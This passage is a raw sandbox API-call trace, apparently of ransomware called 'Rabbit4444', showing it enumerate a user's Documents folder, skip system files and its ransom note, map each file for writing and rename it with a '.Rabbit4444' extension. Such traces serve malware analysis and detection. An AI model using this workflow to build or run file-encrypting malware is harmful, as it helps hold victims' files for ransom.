ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6cb3092, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.454] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.454] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.454] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.454] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.454] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.454] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91b90940, ftCreationTime.dwHighDateTime=0x1d4c552, ftLastAccessTime.dwLowDateTime=0x8518fc30, ftLastAccessTime.dwHighDateTime=0x1d53731, ftLastWriteTime.dwLowDateTime=0x8518fc30, ftLastWriteTime.dwHighDateTime=0x1d53731, nFileSizeHigh=0x0, nFileSizeLow=0x11fdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-33gPV9.xlsx", cAlternateFileName="-33GPV~1.XLS")) returned 1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="Rabbit4444.exe") returned -1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2=".") returned 1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="..") returned 1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="windows") returned -1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="bootmgr") returned -1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="pagefile.sys") returned -1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="boot") returned -1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="ids.txt") returned -1 [0049.454] lstrcmpiW (lpString1="-33gPV9.xlsx", lpString2="NTUSER.DAT") returned -1 [0049.454] lstrcpyW (in: lpString1=0x130eb6c, lpString2="-33gPV9.xlsx" | out: lpString1="-33gPV9.xlsx") returned="-33gPV9.xlsx" [0049.454] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\-33gPV9.xlsx", dwFileAttributes=0x0) returned 1 [0049.455] lstrlenW (lpString="-33gPV9.xlsx") returned 12 [0049.455] lstrlenW (lpString="Rabbit4444") returned 10 [0049.455] lstrcmpiW (lpString1="3gPV9.xlsx", lpString2="Rabbit4444") returned -1 [0049.455] lstrlenW (lpString=".dll") returned 4 [0049.455] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0049.455] lstrlenW (lpString=".lnk") returned 4 [0049.455] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0049.455] lstrlenW (lpString=".ini") returned 4 [0049.455] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0049.455] lstrlenW (lpString=".sys") returned 4 [0049.455] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0049.455] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\-33gPV9.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\-33gpv9.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.455] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.455] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14076582044) returned 1 [0049.455] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=73693) returned 1 [0049.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0049.455] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x122e0, lpName=0x0) returned 0x298 [0049.455] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x122e0) returned 0x70000 [0049.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.458] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14076878244) returned 1 [0049.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0049.458] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.459] CloseHandle (hObject=0x298) returned 1 [0049.459] CloseHandle (hObject=0x278) returned 1 [0049.459] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\-33gPV9.xlsx.Rabbit4444") returned 49 [0049.459] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\-33gPV9.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\-33gpv9.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\-33gPV9.xlsx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\-33gpv9.xlsx.rabbit4444"), dwFlags=0x1) returned 1 [0049.460] InterlockedExchangeAdd (in: Addend=0xff618, Value=73696 | out: Addend=0xff618) returned 21085344 [0049.460] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3581 [0049.460] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd131660, ftCreationTime.dwHighDateTime=0x1d51ff2, ftLastAccessTime.dwLowDateTime=0x83701880, ftLastAccessTime.dwHighDateTime=0x1d4ba3d, ftLastWriteTime.dwLowDateTime=0x83701880, ftLastWriteTime.dwHighDateTime=0x1d4ba3d, nFileSizeHigh=0x0, nFileSizeLow=0x13213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-3XRYUkfmqMg59Ll.pptx", cAlternateFileName="-3XRYU~1.PPT")) returned 1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="Rabbit4444.exe") returned -1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2=".") returned 1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="..") returned 1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="windows") returned -1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="bootmgr") returned -1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="pagefile.sys") returned -1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="boot") returned -1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="ids.txt") returned -1 [0049.460] lstrcmpiW (lpString1="-3XRYUkfmqMg59Ll.pptx", lpString2="NTUSER.DAT") returned -1 [0049.460] lstrcpyW (in: lpString1=0x130eb6c, lpString2="-3XRYUkfmqMg59Ll.pptx" | out: lpString1="-3XRYUkfmqMg59Ll.pptx") returned="-3XRYUkfmqMg59Ll.pptx" [0049.460] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\-3XRYUkfmqMg59Ll.pptx", dwFileAttributes=0x0) returned 1 [0049.461] lstrlenW (lpString="-3XRYUkfmqMg59Ll.pptx") returned 21 [0049.461] lstrlenW (lpString="Rabbit4444") returned 10 [0049.461] lstrcmpiW (lpString1="g59Ll.pptx", lpString2="Rabbit4444") returned -1 [0049.461] lstrlenW (lpString=".dll") returned 4 [0049.461] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.461] lstrlenW (lpString=".lnk") returned 4 [0049.461] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.461] lstrlenW (lpString=".ini") returned 4 [0049.461] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.461] lstrlenW (lpString=".sys") returned 4 [0049.461] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\-3XRYUkfmqMg59Ll.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\-3xryukfmqmg59ll.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.461] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.461] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14077173568) returned 1 [0049.461] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=78355) returned 1 [0049.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0049.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0049.461] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13520, lpName=0x0) returned 0x298 [0049.461] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13520) returned 0x70000 [0049.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.464] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14077434519) returned 1 [0049.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0049.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0049.464] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.464] CloseHandle (hObject=0x298) returned 1 [0049.465] CloseHandle (hObject=0x278) returned 1 [0049.465] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\-3XRYUkfmqMg59Ll.pptx.Rabbit4444") returned 58 [0049.465] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\-3XRYUkfmqMg59Ll.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\-3xryukfmqmg59ll.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\-3XRYUkfmqMg59Ll.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\-3xryukfmqmg59ll.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0049.466] InterlockedExchangeAdd (in: Addend=0xff618, Value=78368 | out: Addend=0xff618) returned 21159040 [0049.466] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3583 [0049.466] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6cb3092, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6cb3092, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6cd92b6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.466] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.466] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.466] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2c5440, ftCreationTime.dwHighDateTime=0x1d4d056, ftLastAccessTime.dwLowDateTime=0x6243cfa0, ftLastAccessTime.dwHighDateTime=0x1d5214c, ftLastWriteTime.dwLowDateTime=0x6243cfa0, ftLastWriteTime.dwHighDateTime=0x1d5214c, nFileSizeHigh=0x0, nFileSizeLow=0x673d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0t09mDlRL QY9tqd.xlsx", cAlternateFileName="0T09MD~1.XLS")) returned 1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="Rabbit4444.exe") returned -1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2=".") returned 1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="..") returned 1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="windows") returned -1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="bootmgr") returned -1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="pagefile.sys") returned -1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="boot") returned -1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="ids.txt") returned -1 [0049.466] lstrcmpiW (lpString1="0t09mDlRL QY9tqd.xlsx", lpString2="NTUSER.DAT") returned -1 [0049.466] lstrcpyW (in: lpString1=0x130eb6c, lpString2="0t09mDlRL QY9tqd.xlsx" | out: lpString1="0t09mDlRL QY9tqd.xlsx") returned="0t09mDlRL QY9tqd.xlsx" [0049.466] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\0t09mDlRL QY9tqd.xlsx", dwFileAttributes=0x0) returned 1 [0049.466] lstrlenW (lpString="0t09mDlRL QY9tqd.xlsx") returned 21 [0049.466] lstrlenW (lpString="Rabbit4444") returned 10 [0049.466] lstrcmpiW (lpString1="Y9tqd.xlsx", lpString2="Rabbit4444") returned 1 [0049.466] lstrlenW (lpString=".dll") returned 4 [0049.466] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0049.466] lstrlenW (lpString=".lnk") returned 4 [0049.467] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0049.467] lstrlenW (lpString=".ini") returned 4 [0049.467] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0049.467] lstrlenW (lpString=".sys") returned 4 [0049.467] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0049.467] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\0t09mDlRL QY9tqd.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\0t09mdlrl qy9tqd.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.467] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.467] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14077778511) returned 1 [0049.467] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=26429) returned 1 [0049.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0049.467] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a40, lpName=0x0) returned 0x298 [0049.467] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a40) returned 0x70000 [0049.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.469] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14077941408) returned 1 [0049.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0049.469] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.469] CloseHandle (hObject=0x298) returned 1 [0049.469] CloseHandle (hObject=0x278) returned 1 [0049.470] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\0t09mDlRL QY9tqd.xlsx.Rabbit4444") returned 58 [0049.470] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\0t09mDlRL QY9tqd.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\0t09mdlrl qy9tqd.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\0t09mDlRL QY9tqd.xlsx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\0t09mdlrl qy9tqd.xlsx.rabbit4444"), dwFlags=0x1) returned 1 [0049.470] InterlockedExchangeAdd (in: Addend=0xff618, Value=26432 | out: Addend=0xff618) returned 21237408 [0049.470] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3585 [0049.470] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe33e7320, ftCreationTime.dwHighDateTime=0x1d4c649, ftLastAccessTime.dwLowDateTime=0x22eb3200, ftLastAccessTime.dwHighDateTime=0x1d4c8b2, ftLastWriteTime.dwLowDateTime=0x22eb3200, ftLastWriteTime.dwHighDateTime=0x1d4c8b2, nFileSizeHigh=0x0, nFileSizeLow=0x1193e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2qoDue.ppt", cAlternateFileName="")) returned 1 [0049.470] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.470] lstrcmpiW (lpString1="2qoDue.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.470] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="Rabbit4444.exe") returned -1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2=".") returned 1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="..") returned 1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="windows") returned -1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="bootmgr") returned -1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="pagefile.sys") returned -1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="boot") returned -1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="ids.txt") returned -1 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="NTUSER.DAT") returned -1 [0049.471] lstrcpyW (in: lpString1=0x130eb6c, lpString2="2qoDue.ppt" | out: lpString1="2qoDue.ppt") returned="2qoDue.ppt" [0049.471] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\2qoDue.ppt", dwFileAttributes=0x0) returned 1 [0049.471] lstrlenW (lpString="2qoDue.ppt") returned 10 [0049.471] lstrlenW (lpString="Rabbit4444") returned 10 [0049.471] lstrcmpiW (lpString1="2qoDue.ppt", lpString2="Rabbit4444") returned -1 [0049.471] lstrlenW (lpString=".dll") returned 4 [0049.471] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.471] lstrlenW (lpString=".lnk") returned 4 [0049.471] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0049.471] lstrlenW (lpString=".ini") returned 4 [0049.471] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0049.471] lstrlenW (lpString=".sys") returned 4 [0049.471] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0049.471] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\2qoDue.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\2qodue.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.471] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.471] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14078215300) returned 1 [0049.471] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=71998) returned 1 [0049.472] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0049.472] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0049.472] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11c40, lpName=0x0) returned 0x298 [0049.472] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11c40) returned 0x70000 [0049.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.474] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14078466952) returned 1 [0049.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0049.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0049.474] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.475] CloseHandle (hObject=0x298) returned 1 [0049.475] CloseHandle (hObject=0x278) returned 1 [0049.477] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\2qoDue.ppt.Rabbit4444") returned 47 [0049.477] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\2qoDue.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\2qodue.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\2qoDue.ppt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\2qodue.ppt.rabbit4444"), dwFlags=0x1) returned 1 [0049.477] InterlockedExchangeAdd (in: Addend=0xff618, Value=72000 | out: Addend=0xff618) returned 21263840 [0049.477] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3586 [0049.477] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e0683f0, ftCreationTime.dwHighDateTime=0x1d4d22f, ftLastAccessTime.dwLowDateTime=0xacfa2e30, ftLastAccessTime.dwHighDateTime=0x1d4ccde, ftLastWriteTime.dwLowDateTime=0xacfa2e30, ftLastWriteTime.dwHighDateTime=0x1d4ccde, nFileSizeHigh=0x0, nFileSizeLow=0xe284, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="35ULey8kyqPR4IR.pps", cAlternateFileName="35ULEY~1.PPS")) returned 1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="Rabbit4444.exe") returned -1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2=".") returned 1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="..") returned 1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="windows") returned -1 [0049.477] lstrcmpiW (lpString1="35ULey8kyqPR4IR.pps", lpString2="bootmgr") returned -1 [0049.477] 